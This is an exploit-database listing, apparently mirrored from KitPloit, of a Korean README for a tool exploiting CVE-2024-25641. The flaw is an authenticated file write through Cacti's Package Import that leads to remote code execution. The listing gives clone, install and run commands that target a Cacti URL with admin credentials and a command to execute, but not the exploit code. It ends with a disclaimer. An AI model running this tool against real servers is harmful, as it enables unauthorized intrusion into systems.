Sploitus

Exploit for CVE-2024-25641-CACTI-RCE-1.2.26

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN49 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-STOPTHATTALACE-CVE-2024-25641-CACTI-RCE-1.2.26
# CVE-2024-25641 - Cacti 1.2.26 - μž„μ˜ 파일 μ“°κΈ°λ₯Ό ν†΅ν•œ RCE 🌡

  * `인증된 RCE`
  * `Cacti 버전 < v1.2.26`



## μš”μ•½

* * *

μž„μ˜ 파일 μ“°κΈ° 취약점은 "Package Import" κΈ°λŠ₯을 톡해 μ•…μš©ν•  수 있으며, "Import Templates" κΆŒν•œμ„ κ°€μ§„ 인증된 μ‚¬μš©μžκ°€ μ›Ή μ„œλ²„μ—μ„œ μž„μ˜μ˜ PHP μ½”λ“œλ₯Ό μ‹€ν–‰ν•  수 있게 ν•©λ‹ˆλ‹€ (RCE).

## κ°œλ… 증λͺ… (PoC)

* * *

![CVE DEMO](https://assets.kitploit.com/production/public/readmes/20871/fb0f1fd3a9718ff6f20bf20c6bc06ab1d11ce368079263a46d065063d32f1cc5.png)

## μ‚¬μš©λ²•

* * *

root@kitploit:~
    
    
    git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
    
    pip install -r requirements.txt
    
    python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
    

### poetry μ‚¬μš© μ‹œ

root@kitploit:~
    
    
    git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
    
    poetry install
    
    poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
    

## λ©΄μ±… μ‘°ν•­

이 λ„κ΅¬λŠ” ꡐ윑 및 ν…ŒμŠ€νŠΈ λͺ©μ μœΌλ‘œλ§Œ μ œκ³΅λ©λ‹ˆλ‹€. 이 λ„κ΅¬μ˜ μ €μžλŠ” 이 도ꡬλ₯Ό μ‚¬μš©ν•˜μ—¬ μˆ˜ν–‰λœ λͺ¨λ“  였용 λ˜λŠ” λΆˆλ²• ν™œλ™μ— λŒ€ν•΄ μ±…μž„μ„ μ§€μ§€ μ•ŠμŠ΅λ‹ˆλ‹€. μ†Œμœ ν•œ μ‹œμŠ€ν…œμ΄λ‚˜ ν…ŒμŠ€νŠΈλ₯Ό μœ„ν•΄ λͺ…μ‹œμ  ν—ˆκ°€λ₯Ό 받은 μ‹œμŠ€ν…œμ—μ„œλ§Œ 이 도ꡬλ₯Ό μ‚¬μš©ν•˜μ‹­μ‹œμ˜€. 컴퓨터 μ‹œμŠ€ν…œμ— λŒ€ν•œ 무단 μ•‘μ„ΈμŠ€λŠ” λΆˆλ²•μ΄λ©° λΉ„μœ€λ¦¬μ μž…λ‹ˆλ‹€.